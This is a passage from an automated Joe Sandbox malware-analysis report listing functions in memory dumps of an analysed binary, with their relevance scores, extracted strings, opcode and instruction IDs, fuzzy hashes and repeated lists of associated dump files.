                                                                                          • Opcode Fuzzy Hash: 2fdb716fb734336c641400e989a2ccb28f128cb9f6315dcb1059d3878b0cac65
                                                                                          • Instruction Fuzzy Hash: DAA138702047428FE3258F24C891763BBA2FF66314F28865ED4A60B7D2D779E806C7A5
                                                                                          Function 0063BEB2 Relevance: 7.8, Strings: 5, Instructions: 1599COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 5*?W$7\J[$SGp$TN~}$iP
                                                                                          • API String ID: 0-2613427793
                                                                                          • Opcode ID: 9bc60512393515936dd2aea9ffb9fb5a95256ac1f35aada804f9f7d0de672156
                                                                                          • Instruction ID: f4fb52fe9b723a5236d526bf5499ef086853c16b9a4d15b2c9608a87c9f79378
                                                                                          • Opcode Fuzzy Hash: 9bc60512393515936dd2aea9ffb9fb5a95256ac1f35aada804f9f7d0de672156
                                                                                          • Instruction Fuzzy Hash: C7B2E6F3A082049FE3046E2DEC8567AFBE9EF94720F1A493DEAC5C3744E93558058697
                                                                                          Function 004998F2 Relevance: 7.8, Strings: 6, Instructions: 303COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Y^S$#g>#$$*- $UjcW$YRTP$o$
                                                                                          • API String ID: 0-2638604102
                                                                                          • Opcode ID: 581ebc1a5f145eae30b509ced77de9bec468b856ee78ffd6995f457f4522b386
                                                                                          • Instruction ID: 4d6e7614ae4278167f0cbbc3e35f776c599ea5a08edc2dda41e5faae3ef0bc52
                                                                                          • Opcode Fuzzy Hash: 581ebc1a5f145eae30b509ced77de9bec468b856ee78ffd6995f457f4522b386
                                                                                          • Instruction Fuzzy Hash: C8A138316583818FEB348B6884913A7BFE1EF56350F088A3EC4D94B382C7389C09D75A
                                                                                          Function 0063F55D Relevance: 7.7, Strings: 5, Instructions: 1431COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: !:/$R~o$ZgWw$]3sw$`:u
                                                                                          • API String ID: 0-3514904865
                                                                                          • Opcode ID: 3d13c1bca9f9243376db297d2153721ec8822730e5ba1071324369c28b035fb6
                                                                                          • Instruction ID: d3ff8403bdf2a54b9670d8e6d4bbe13edb41e53f753cbbd9295d3b953500e6a3
                                                                                          • Opcode Fuzzy Hash: 3d13c1bca9f9243376db297d2153721ec8822730e5ba1071324369c28b035fb6
                                                                                          • Instruction Fuzzy Hash: B9A2D5F360C6049FE304AE2DEC8567ABBE9EF94720F16893DE6C4C7744E63598018697
                                                                                          Function 004AF020 Relevance: 6.9, Strings: 5, Instructions: 644COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: "#<$8977$InA>$InA>$f
                                                                                          • API String ID: 2994545307-3216925240
                                                                                          • Opcode ID: 87dbc862e3cad6f6e8f1c52bcce59e6b534db51351931a8eb53e027e631d30f1
                                                                                          • Instruction ID: ba27eb9fea8400f1723cab7fc9ded9a6911c19465b39e6749c1e1c3565082259
                                                                                          • Opcode Fuzzy Hash: 87dbc862e3cad6f6e8f1c52bcce59e6b534db51351931a8eb53e027e631d30f1
                                                                                          • Instruction Fuzzy Hash: 4122C4756083419FC714CF59C890A2BBBE1AFD9314F188A3EF895873A1D738D849CB56
                                                                                          Function 00471328 Relevance: 6.6, Strings: 5, Instructions: 387COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff
                                                                                          • API String ID: 0-3620105454
                                                                                          • Opcode ID: f128b674bc07962cd05db3d0c1538bb5d943c99a045c3c6248e65c00ba03085e
                                                                                          • Instruction ID: f4ba89695e10ea62511a1202fa37330edf71965bb5c31363379dca49eddfe9b8
                                                                                          • Opcode Fuzzy Hash: f128b674bc07962cd05db3d0c1538bb5d943c99a045c3c6248e65c00ba03085e
                                                                                          • Instruction Fuzzy Hash: 75E1B37160C7918FC715CF29C1802AAFBE1AFD9304F08CA6EE9C987352D278D945CB96
                                                                                          Function 0049CBD0 Relevance: 5.6, Strings: 4, Instructions: 555COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 8?$BcPX$`;|9$`cPX
                                                                                          • API String ID: 0-3600580882
                                                                                          • Opcode ID: 7d7336f295931ecf0adaca55809ace497707920e94ff1a7d49419ed673615edd
                                                                                          • Instruction ID: ad8306ea10df31160402beb676b275a927ccece6252ff4f179540d22665578d9
                                                                                          • Opcode Fuzzy Hash: 7d7336f295931ecf0adaca55809ace497707920e94ff1a7d49419ed673615edd
                                                                                          • Instruction Fuzzy Hash: 2EF1CAB15083518BD720CF24C8917ABBBE1EFC1708F058A2DE9D55B390E7799909CBD6
                                                                                          Function 0048E07E Relevance: 5.5, Strings: 4, Instructions: 523COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
